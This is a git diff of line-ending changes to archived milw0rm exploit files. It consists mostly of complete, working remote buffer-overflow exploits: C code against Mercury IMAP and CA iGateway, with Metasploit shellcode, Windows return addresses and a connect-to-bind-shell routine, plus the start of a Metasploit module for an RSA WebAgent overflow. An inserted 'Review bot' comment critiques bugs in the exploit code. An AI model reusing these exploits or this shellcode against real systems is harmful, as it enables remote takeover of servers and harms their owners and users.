-"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16" -"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4" -"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a" -"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb" -"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64" -"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b"; - - - void gotshell (int newsock); - unsigned int rc,sock,os,addr,rc2 ; - struct sockaddr_in tcp; - struct hostent *hp; - WSADATA wsaData; - char buffer[size]; - char point_esp[5]; - unsigned short 
port; - char req1[] = "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E"; - char req2[] = "\x30\x30\x30\x31"; - unsigned char *login,*exploit; - char vuln_command[] = "\x4C\x49\x53\x54"; - char winxpsp1[] = "\xCC\x59\xFB\x77"; // jmp esp in ntdll - char winxpsp2[] = "\xED\x1E\x94\x7C"; // jmp esp (not tested) - char win2ksp4[] = "\x23\xde\xaf\x01"; // call esp in kernel32.dll - char win2k3_sp0[] = "\xAB\x8B\xFB\x77"; // jmp esp in ntdll - char win2k3_sp1[] = "\x6A\xFA\xE8\x77"; // push esp - ret in kernel32 - - int main (int argc, char *argv[]){ - - - if(argc < 6) { - printf("\n-------- mercury imap remote BOF exploit by c0d3r\n"); - printf("-------- usage : imap.exe host port target username password\n"); - printf("-------- target 1 : windows xp service pack 1 : 0\n"); - printf("-------- target 2 : windows xp service pack 2 : 1\n"); - printf("-------- target 3 : windoes 2k advanced server sp 4 : 2\n"); - printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n"); - printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n"); - printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n"); - exit(-1) ; - } - printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n"); - os = (unsigned short)atoi(argv[3]); - switch(os) - { - case 0: - strcat(point_esp,winxpsp1); - printf("[+] target : windows xp service pack 1\n"); - break; - case 1: - strcat(point_esp,winxpsp2); - printf("[+] target : windows xp service pack 2\n"); - break; - case 2: - strcat(point_esp,win2ksp4); - printf("[+] target : windows 2000 advanced server service pack 4\n"); - break; - case 3: - strcat(point_esp,win2k3_sp0); - printf("[+] target : windows 2003 server enterprise service pack 0\n"); - break; - case 4: - strcat(point_esp,win2k3_sp1); - printf("[+] target : windows 2003 server enterprise service pack 1\n"); - break; - default: - printf("\n[-] this target doesnt exist in the list\n\n"); - - exit(-1); - } - - printf("[+] building login data\n"); - login = malloc(256); - 
memset(login,0,256); - sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]); - - // Creating heart of exploit code 4 5 - - printf("[+] building overflow string"); - - memset(buffer,NOP,size); - memcpy(buffer+260,point_esp,sizeof(point_esp)-1); - memcpy(buffer+280,shellcode,sizeof(shellcode)-1); - buffer[size] = 0; - exploit = malloc(1000); - memset(exploit,0,1000); - sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer); - - // EO heart of exploit code - - - if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){ - printf("[-] WSAStartup failed !\n"); - exit(-1); - } - hp = gethostbyname(argv[1]); - Sleep(1500); - if (!hp){ - addr = inet_addr(argv[1]); - } - if ((!hp) && (addr == INADDR_NONE) ){ - printf("[-] unable to resolve %s\n",argv[1]); - exit(-1); - } - sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - if (!sock){ - printf("[-] socket() error...\n"); - exit(-1); - } - if (hp != NULL) - memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length); - else - tcp.sin_addr.s_addr = addr; - - if (hp) - tcp.sin_family = hp->h_addrtype; - else - tcp.sin_family = AF_INET; - port=atoi(argv[2]); - tcp.sin_port=htons(port); - - - printf("\n[+] attacking host %s\n" , argv[1]) ; - - Sleep(1000); - - printf("[+] packet size = %d byte\n" , sizeof(buffer)); - - rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); - if(rc==0) - { - - Sleep(1500) ; - printf("[+] connected\n") ; - printf("[+] sending login info\n") ; - send(sock,login,strlen(login),0); - Sleep(1500); - printf("[+] sending exploit string\n") ; - send(sock,exploit,strlen(exploit),0); - Sleep(1500); - printf("[+] exploit sent successfully to %s \n" , argv[1]); - printf("[+] trying to get shell\n"); - printf("[+] connecting to %s on port 4444\n",argv[1]); - sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - Sleep(1500); - if (!sock){ - printf("[-] socket() error...\n"); - exit(-1); - } - tcp.sin_family = AF_INET; - tcp.sin_port=htons(4444); - rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); - 
if(rc2 != 0) { - printf("[-] exploit probably failed\n"); - exit(-1); - } - if(rc2==0) - { - printf("[+] target exploited successfully\n"); - printf("[+] Dropping into shell\n\n"); - gotshell(sock); - } - } - - else { - printf("[-] ouch! Server is not listening .... \n"); - } - shutdown(sock,1); - closesocket(sock); - } - void gotshell(int new_sock) - { - struct timeval tv; - int length; - unsigned long o[2]; - char bufferx[1000]; - - tv.tv_sec = 1; - tv.tv_usec = 0; - - while (1) { - - o[0] = 1; - o[1] = new_sock; - - length = select (0, (fd_set *)&o, NULL, NULL, &tv); - if(length == 1) - { - length = recv (new_sock, bufferx, sizeof (bufferx), 0); - if (length <= 0) - { - printf ("[-] Connection closed.\n"); - WSACleanup(); - return; - } - length = write (1, bufferx, length); - if (length <= 0) - { - printf("[-] Connection closed.\n"); - WSACleanup(); - return; - } - } - else - { - length = read (0, bufferx, sizeof (bufferx)); - if (length <= 0) - { - printf("[-] Connection closed.\n"); - WSACleanup(); - return; - } - length = send(new_sock, bufferx, length, 0); - if (length <= 0) - { - printf("[-] Connection closed.\n"); - WSACleanup(); - return; - } - } - } - } - -// milw0rm.com [2005-09-20] +/* + Mercury imap4 server remote buffer overflow exploit + author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org + package : Mercury mail transport system 4.01a and prolly prior + workaround : upgrade to 4.01b version + advisory : not available right now + company address : www.pmail.com + timeline : + 15 Sep 2005 : vulnerability reported by securiteam mailing list + 20 Sep 2005 : IHS exploit released + exploit features : + 1) 5 working targets including win2k , winxp , win2k3 + 2) reliable metasploit shellcode + 3) autoconnect to shell + bad chars are : 0x20 0x0a + compiled with visual c++ 6 : cl mercury_imap.c + greeting to : + www.ihsteam.com the team , LorD and NT heya + www.ihsteam.net english version , + www.exploitdev.com Jamie and Ben the two good brothers 
also my brothers + www.metasploit.com when are you gonna release the newer version :P ? + www.class101.org class with his new laptop :> + www.milw0rm.com str0ke , I am sending it to you first dont doubt :d + www.c0d3r.org study time started :((( , pitty for the c0d3r ! + shout to actionspider + read these lines and try to understand ( I know you cant akhey ) that + an script kiddie (defacer) never ever could be compared to an exploit coder + try to grow , being grown up is not related to age -- with respects +/* +/* + +D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc + +-------- mercury imap remote BOF exploit by c0d3r + +[+] target : windows 2003 server enterprise service pack 1 +[+] building login data +[+] building overflow string +[+] attacking host ihs +[+] packet size = 625 byte +[+] connected +[+] sending login info +[+] sending exploit string +[+] exploit sent successfully to ihs +[+] trying to get shell +[+] connecting to ihs on port 4444 +[+] target exploited successfully +[+] Dropping into shell + +Microsoft Windows [Version 5.2.3790] +(C) Copyright 1985-2003 Microsoft Corp. 
+ +H:\MERCURY> + +*/ + +#include +#include +#include +#include +#pragma comment(lib, "ws2_32.lib") +#define NOP 0x90 +#define size 625 +// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1 + + +// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub +// bad chars : 0x00 0x0a 0x20 0x0d + +char shellcode[]= +"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92" +"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4" +"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0" +"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2" +"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13" +"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0" +"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0" +"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b" +"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb" +"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39" +"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68" +"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda" +"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53" +"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72" +"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c" +"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b" +"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16" +"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4" +"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a" +"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb" +"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64" +"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b"; + + + void gotshell (int newsock); + unsigned int rc,sock,os,addr,rc2 ; + struct sockaddr_in tcp; + struct hostent *hp; + WSADATA wsaData; + char buffer[size]; + char point_esp[5]; + unsigned short 
port; + char req1[] = "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E"; + char req2[] = "\x30\x30\x30\x31"; + unsigned char *login,*exploit; + char vuln_command[] = "\x4C\x49\x53\x54"; + char winxpsp1[] = "\xCC\x59\xFB\x77"; // jmp esp in ntdll + char winxpsp2[] = "\xED\x1E\x94\x7C"; // jmp esp (not tested) + char win2ksp4[] = "\x23\xde\xaf\x01"; // call esp in kernel32.dll + char win2k3_sp0[] = "\xAB\x8B\xFB\x77"; // jmp esp in ntdll + char win2k3_sp1[] = "\x6A\xFA\xE8\x77"; // push esp - ret in kernel32 + + int main (int argc, char *argv[]){ + + + if(argc < 6) { + printf("\n-------- mercury imap remote BOF exploit by c0d3r\n"); + printf("-------- usage : imap.exe host port target username password\n"); + printf("-------- target 1 : windows xp service pack 1 : 0\n"); + printf("-------- target 2 : windows xp service pack 2 : 1\n"); + printf("-------- target 3 : windoes 2k advanced server sp 4 : 2\n"); + printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n"); + printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n"); + printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n"); + exit(-1) ; + } + printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n"); + os = (unsigned short)atoi(argv[3]); + switch(os) + { + case 0: + strcat(point_esp,winxpsp1); + printf("[+] target : windows xp service pack 1\n"); + break; + case 1: + strcat(point_esp,winxpsp2); + printf("[+] target : windows xp service pack 2\n"); + break; + case 2: + strcat(point_esp,win2ksp4); + printf("[+] target : windows 2000 advanced server service pack 4\n"); + break; + case 3: + strcat(point_esp,win2k3_sp0); + printf("[+] target : windows 2003 server enterprise service pack 0\n"); + break; + case 4: + strcat(point_esp,win2k3_sp1); + printf("[+] target : windows 2003 server enterprise service pack 1\n"); + break; + default: + printf("\n[-] this target doesnt exist in the list\n\n"); + + exit(-1); + } + + printf("[+] building login data\n"); + login = malloc(256); + 
memset(login,0,256); + sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]); + + // Creating heart of exploit code 4 5 + + printf("[+] building overflow string"); + + memset(buffer,NOP,size); + memcpy(buffer+260,point_esp,sizeof(point_esp)-1); + memcpy(buffer+280,shellcode,sizeof(shellcode)-1); + buffer[size] = 0; + exploit = malloc(1000); + memset(exploit,0,1000); + sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer); + + // EO heart of exploit code + + + if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){ + printf("[-] WSAStartup failed !\n"); + exit(-1); + } + hp = gethostbyname(argv[1]); + Sleep(1500); + if (!hp){ + addr = inet_addr(argv[1]); + } + if ((!hp) && (addr == INADDR_NONE) ){ + printf("[-] unable to resolve %s\n",argv[1]); + exit(-1); + } + sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); + if (!sock){ + printf("[-] socket() error...\n"); + exit(-1); + } + if (hp != NULL) + memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length); + else + tcp.sin_addr.s_addr = addr; + + if (hp) + tcp.sin_family = hp->h_addrtype; + else + tcp.sin_family = AF_INET; + port=atoi(argv[2]); + tcp.sin_port=htons(port); + + + printf("\n[+] attacking host %s\n" , argv[1]) ; + + Sleep(1000); + + printf("[+] packet size = %d byte\n" , sizeof(buffer)); + + rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); + if(rc==0) + { + + Sleep(1500) ; + printf("[+] connected\n") ; + printf("[+] sending login info\n") ; + send(sock,login,strlen(login),0); + Sleep(1500); + printf("[+] sending exploit string\n") ; + send(sock,exploit,strlen(exploit),0); + Sleep(1500); + printf("[+] exploit sent successfully to %s \n" , argv[1]); + printf("[+] trying to get shell\n"); + printf("[+] connecting to %s on port 4444\n",argv[1]); + sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); + Sleep(1500); + if (!sock){ + printf("[-] socket() error...\n"); + exit(-1); + } + tcp.sin_family = AF_INET; + tcp.sin_port=htons(4444); + rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); + 
if(rc2 != 0) { + printf("[-] exploit probably failed\n"); + exit(-1); + } + if(rc2==0) + { + printf("[+] target exploited successfully\n"); + printf("[+] Dropping into shell\n\n"); + gotshell(sock); + } + } + + else { + printf("[-] ouch! Server is not listening .... \n"); + } + shutdown(sock,1); + closesocket(sock); + } + void gotshell(int new_sock) + { + struct timeval tv; + int length; + unsigned long o[2]; + char bufferx[1000]; + + tv.tv_sec = 1; + tv.tv_usec = 0; + + while (1) { + + o[0] = 1; + o[1] = new_sock; + + length = select (0, (fd_set *)&o, NULL, NULL, &tv); + if(length == 1) + { + length = recv (new_sock, bufferx, sizeof (bufferx), 0); + if (length <= 0) + { + printf ("[-] Connection closed.\n"); + WSACleanup(); + return; + } + length = write (1, bufferx, length); + if (length <= 0) + { + printf("[-] Connection closed.\n"); + WSACleanup(); + return; + } + } + else + { + length = read (0, bufferx, sizeof (bufferx)); + if (length <= 0) + { + printf("[-] Connection closed.\n"); + WSACleanup(); + return; + } + length = send(new_sock, bufferx, length, 0); + if (length <= 0) + { + printf("[-] Connection closed.\n"); + WSACleanup(); + return; + } + } + } + } + +// milw0rm.com [2005-09-20] diff --git a/platforms/windows/remote/123.c b/platforms/windows/remote/123.c index f8e44646d..df118b0ce 100755 --- a/platforms/windows/remote/123.c +++ b/platforms/windows/remote/123.c @@ -482,6 +482,6 @@ int main(int argc, char *argv[]) { return 0; -} - -// milw0rm.com [2003-11-14] +} + +// milw0rm.com [2003-11-14] diff --git a/platforms/windows/remote/1243.c b/platforms/windows/remote/1243.c index 5401a8e40..817019647 100755 --- a/platforms/windows/remote/1243.c +++ b/platforms/windows/remote/1243.c 
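Review bot: `buffer[size] = 0;` in main() writes one byte past the end of `char buffer[size]` (625 elements, indices 0..624), and because no in-bounds byte is NUL after `memset(buffer,NOP,size)`, the following `sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer)` reads past the array until it happens to hit a zero in whatever global follows. The header comment's own arithmetic (260 + 4 + 16 + 344 + 1) shows the extra byte was meant for the terminator, so either fill one byte less, `memset(buffer, NOP, size - 1); buffer[size - 1] = 0;`, or declare `char buffer[size + 1];`. Separately, both `if (!sock)` checks can never fire on Winsock: `sock` is an `unsigned int` and a failed `socket()` returns `INVALID_SOCKET` (all bits set), not 0, so the comparison should be `if (sock == INVALID_SOCKET)`. This hunk is a whole-file line-ending rewrite, so neither defect is introduced by this commit, but both are in the new side as committed.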
@@ -1,108 +1,108 @@ -/*ca igateway debug remote overflow -egm erikam@gmail.com*/ -/*01.30.05*/ -#include -#include -#include -#include - -const int MAXSIZE = 17110; - -char sc[] = //metasploit -"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d" -"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79" -"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01" -"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d" -"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc" -"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35" -"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15" -"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf" -"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e\x1e\xc5\x62\x4d\x92\x27\x55\xd2" -"\x80\x0b\x06\x49\x92\x21\x62\x90\x88\x91\xbc\xf4\x65\xf5\x68\x73" -"\x6f\x08\xed\x71\xb4\xfe\xc8\xb4\x3a\x08\xeb\x4a\x3e\xa4\x6e\x4a" -"\x2e\xa4\x7e\x4a\x92\x27\x5b\x71\x6b\x58\x5b\x4a\xe4\x16\xa8\x71" -"\xc9\xed\x4d\xde\x3a\x08\xeb\x73\x7d\xa6\x68\xe6\xbd\x9f\x99\xb4" -"\x43\x1e\x6a\xe6\xbb\xa4\x68\xe6\xbd\x9f\xd8\x50\xeb\xbe\x6a\xe6" -"\xbb\xa7\x69\x4d\x38\x08\xed\x8a\x05\x10\x44\xdf\x14\xa0\xc2\xcf" -"\x38\x08\xed\x7f\x07\x93\x5b\x71\x0e\x9a\xb4\xfc\x07\xa7\x64\x30" -"\xa1\x7e\xda\x73\x29\x7e\xdf\x28\xad\x04\x97\xe7\x2f\xda\xc3\x5b" -"\x41\x64\xb0\x63\x55\x5c\x96\xb2\x05\x85\xc3\xaa\x7b\x08\x48\x5d" -"\x92\x21\x66\x4e\x3f\xa6\x6c\x48\x07\xf6\x6c\x48\x38\xa6\xc2\xc9" -"\x05\x5a\xe4\x1c\xa3\xa4\xc2\xcf\x07\x08\xc2\x2e\x92\x27\xb6\x4e" -"\x91\x74\xf9\x7d\x92\x21\x6f\xe6\xbd\x9f\xcd\x93\x69\xa8\x6e\xe6" -"\xbb\x08\xed\x19\x6d\xf7"; - -int tcp_connect(char *host,int port) { - -struct hostent *hp; -struct sockaddr_in addr; -int sock; - -if (!(hp=gethostbyname(host))){ -fprintf(stderr,"Something died! 
\n"); -return -1; -} - -memset(&addr,0,sizeof(addr)); -addr.sin_addr=*(struct in_addr*)hp->h_addr; -addr.sin_family=AF_INET; -addr.sin_port=htons(port); - -if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){ -fprintf(stderr,"Dead again!\n"); -return -1; -} - -if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){ -fprintf(stderr,"Dead once more! \n"); -return -1; -} -return sock; -} - -/*Just supply a target ./caigw-win32 hostname */ -int main(int argc, char *argv[]) -{ -char buffer[MAXSIZE+1]; -int i = 0; -int sclen = sizeof(sc), sock = 0; - -if(!argv[1]) -return 0; - -memset(buffer,'\x90',MAXSIZE/2); - -memcpy(buffer,"GET",3); - -for(i=3;i<24;i++) -memcpy(buffer+i," ",1); -for(i=21;i<423;i++) -buffer[i] = 'A'; - -/* XP SP2*/ -//memcpy(buffer + 423+25,"\xdd\x10\x12\x12",4); -/*W2ksp4 */ -memcpy(buffer + 422+25,"\xdd\x10\x12\x12",4); - -memcpy(buffer + 460,sc,sclen - 1); -memcpy(buffer + (460 + sclen)," HTTP/1.0\r\n\r\n\r\n",16); -buffer[460+sclen+20] = '\0'; - -if( (sock = tcp_connect(argv[1],5250)) != -1 ) -{ -int bytes = 0; - -printf("[~] Sending request... \n"); -bytes = send(sock,buffer,strlen(buffer),0); -printf("[!] 
Sent [%d] bytes\n",bytes); -} -else -return -1; - -close(sock); -sleep (2); - -printf("[@] Now telnet to port 1711\n"); -return 0; -} - -// milw0rm.com [2005-10-10] +/*ca igateway debug remote overflow -egm erikam@gmail.com*/ +/*01.30.05*/ +#include +#include +#include +#include + +const int MAXSIZE = 17110; + +char sc[] = //metasploit +"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d" +"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79" +"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01" +"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d" +"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc" +"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35" +"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15" +"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf" +"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e\x1e\xc5\x62\x4d\x92\x27\x55\xd2" +"\x80\x0b\x06\x49\x92\x21\x62\x90\x88\x91\xbc\xf4\x65\xf5\x68\x73" +"\x6f\x08\xed\x71\xb4\xfe\xc8\xb4\x3a\x08\xeb\x4a\x3e\xa4\x6e\x4a" +"\x2e\xa4\x7e\x4a\x92\x27\x5b\x71\x6b\x58\x5b\x4a\xe4\x16\xa8\x71" +"\xc9\xed\x4d\xde\x3a\x08\xeb\x73\x7d\xa6\x68\xe6\xbd\x9f\x99\xb4" +"\x43\x1e\x6a\xe6\xbb\xa4\x68\xe6\xbd\x9f\xd8\x50\xeb\xbe\x6a\xe6" +"\xbb\xa7\x69\x4d\x38\x08\xed\x8a\x05\x10\x44\xdf\x14\xa0\xc2\xcf" +"\x38\x08\xed\x7f\x07\x93\x5b\x71\x0e\x9a\xb4\xfc\x07\xa7\x64\x30" +"\xa1\x7e\xda\x73\x29\x7e\xdf\x28\xad\x04\x97\xe7\x2f\xda\xc3\x5b" +"\x41\x64\xb0\x63\x55\x5c\x96\xb2\x05\x85\xc3\xaa\x7b\x08\x48\x5d" +"\x92\x21\x66\x4e\x3f\xa6\x6c\x48\x07\xf6\x6c\x48\x38\xa6\xc2\xc9" +"\x05\x5a\xe4\x1c\xa3\xa4\xc2\xcf\x07\x08\xc2\x2e\x92\x27\xb6\x4e" +"\x91\x74\xf9\x7d\x92\x21\x6f\xe6\xbd\x9f\xcd\x93\x69\xa8\x6e\xe6" +"\xbb\x08\xed\x19\x6d\xf7"; + +int tcp_connect(char *host,int port) { + +struct hostent *hp; +struct sockaddr_in addr; +int sock; + +if (!(hp=gethostbyname(host))){ +fprintf(stderr,"Something died! 
\n"); +return -1; +} + +memset(&addr,0,sizeof(addr)); +addr.sin_addr=*(struct in_addr*)hp->h_addr; +addr.sin_family=AF_INET; +addr.sin_port=htons(port); + +if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){ +fprintf(stderr,"Dead again!\n"); +return -1; +} + +if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){ +fprintf(stderr,"Dead once more! \n"); +return -1; +} +return sock; +} + +/*Just supply a target ./caigw-win32 hostname */ +int main(int argc, char *argv[]) +{ +char buffer[MAXSIZE+1]; +int i = 0; +int sclen = sizeof(sc), sock = 0; + +if(!argv[1]) +return 0; + +memset(buffer,'\x90',MAXSIZE/2); + +memcpy(buffer,"GET",3); + +for(i=3;i<24;i++) +memcpy(buffer+i," ",1); +for(i=21;i<423;i++) +buffer[i] = 'A'; + +/* XP SP2*/ +//memcpy(buffer + 423+25,"\xdd\x10\x12\x12",4); +/*W2ksp4 */ +memcpy(buffer + 422+25,"\xdd\x10\x12\x12",4); + +memcpy(buffer + 460,sc,sclen - 1); +memcpy(buffer + (460 + sclen)," HTTP/1.0\r\n\r\n\r\n",16); +buffer[460+sclen+20] = '\0'; + +if( (sock = tcp_connect(argv[1],5250)) != -1 ) +{ +int bytes = 0; + +printf("[~] Sending request... \n"); +bytes = send(sock,buffer,strlen(buffer),0); +printf("[!] Sent [%d] bytes\n",bytes); +} +else +return -1; + +close(sock); +sleep (2); + +printf("[@] Now telnet to port 1711\n"); +return 0; +} + +// milw0rm.com [2005-10-10] diff --git a/platforms/windows/remote/1260.pm b/platforms/windows/remote/1260.pm index 2f1940f90..d541b4030 100755 --- a/platforms/windows/remote/1260.pm +++ b/platforms/windows/remote/1260.pm 
@@ -1,162 +1,162 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::rsa_iiswebagent_redirect; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'IIS RSA WebAgent Redirect Overflow', - 'Version' => '$Revision: 1.4 $', - 'Authors' => [ 'H D Moore ', ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32' ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 80], - 'SSL' => [0, 'BOOL', 'Use SSL'], - 'URL' => [1, 'DATA', 'The path to the DLL', '/WebID/IISWebAgentIF.dll'], - }, - - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => - "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f". - "\x3a\x3b\x3c\x3d\x3e\x3f\x40\x5c". "Z", - - 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", - 'Keys' => ['+ws2ord'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a stack overflow in the SecurID Web Agent for IIS. - This ISAPI filter runs in-process with inetinfo.exe, any attempt to - exploit this flaw will result in the termination and potential restart - of the IIS service. -}), - - 'Refs' => - [ - # Anyone got a patch/advisory/solution URL? 
- ], - - 'Targets' => - [ - # Version-specific return addresses - ['RSA WebAgent 5.2', 996, 0x1001e694], - ['RSA WebAgent 5.3', 992, 0x10010e89], - - # Generic return addresses - ['RSA WebAgent 5.2 on Windows 2000 English', 996, 0x75022ac4], - ['RSA WebAgent 5.3 on Windows 2000 English', 992, 0x75022ac4], - - ['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', 996, 0x71ab1d54], - ['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', 992, 0x71ab1d54], - - ['RSA WebAgent 5.2 on Windows XP SP2 English', 996, 0x71ab9372], - ['RSA WebAgent 5.3 on Windows XP SP2 English', 992, 0x71ab9372], - - ['RSA WebAgent 5.2 on Windows 2003 English SP0', 996, 0x7ffc0638], - ['RSA WebAgent 5.3 on Windows 2003 English SP0', 992, 0x7ffc0638], - - ], - - 'Keys' => ['rsa'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . 
